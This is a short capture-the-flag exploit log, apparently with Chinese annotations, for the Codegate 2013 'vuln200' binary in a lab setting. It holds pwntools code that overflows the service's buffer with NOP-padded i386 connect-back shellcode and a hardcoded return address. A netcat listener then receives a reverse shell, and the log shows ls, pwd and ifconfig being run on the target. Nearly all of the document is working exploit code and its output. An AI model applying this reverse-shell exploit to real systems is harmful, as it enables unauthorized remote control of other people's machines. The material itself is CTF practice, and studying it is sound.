codegate_quals vuln200

======================= try 1 =======================

from pwn import *

r=remote('192.168.1.104',7777)

>>> r=remote('192.168.1.104',7777)

[x] Opening connection to 192.168.1.104 on port 7777

[x] Opening connection to 192.168.1.104 on port 7777: Trying 192.168.1.104

[+] Opening connection to 192.168.1.104 on port 7777: Done

>>> print(r.recv(1024))

CODEGATE 2013 Util service!

[*] md5

[*] help

[*] base64 encode

[*] base64 decode

[*] quit

>>> r.send('write' + (asm(shellcraft.i386.linux.connect('192.168.1.109',7777)).ljust(0xf0, '\x90')+p32(0xbfdf18cc)))

 

攻击端监听服务 :

# strace -f nc -l -p 7777

......

bind(3, {sa_family=AF_INET, sin_port=htons(7777), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1)                            = 0
rt_sigaction(SIGALRM, {SIG_IGN, [ALRM], SA_RESTORER|SA_RESTART, 0x7fc9a4d1f180}, {SIG_DFL, [], 0}, 8) = 0
alarm(0)                                = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
accept(3, {sa_family=AF_INET, sin_port=htons(50967), sin_addr=inet_addr("192.168.1.104")}, [16]) = 4

......

======================= try 2 =======================

攻击端：

r.close()
r=remote('192.168.1.104',7777)
print(r.recv(1024))
r.send('write' + (asm(shellcraft.i386.linux.connect('192.168.1.109',7777)+shellcraft.i386.linux.dupsh(sock='ebp'))).ljust(0xf0, '\x90')+p32(0xbfdf18cc))

 

 反向shell：

# while [ 1 ];do nc -n -vv -l -p 7777;done
listening on [any] 7777 ...
connect to [192.168.1.109] from (UNKNOWN) [192.168.1.104] 50969
ls
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
pwd
/opt/ctf/pwn/pwntools-write-ups-master/2013/codegate-quals/vuln200
ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:24:54:7b:d2:d9 
          inet addr:192.168.1.104  Bcast:192.168.1.255  Mask:255.255.255.0

......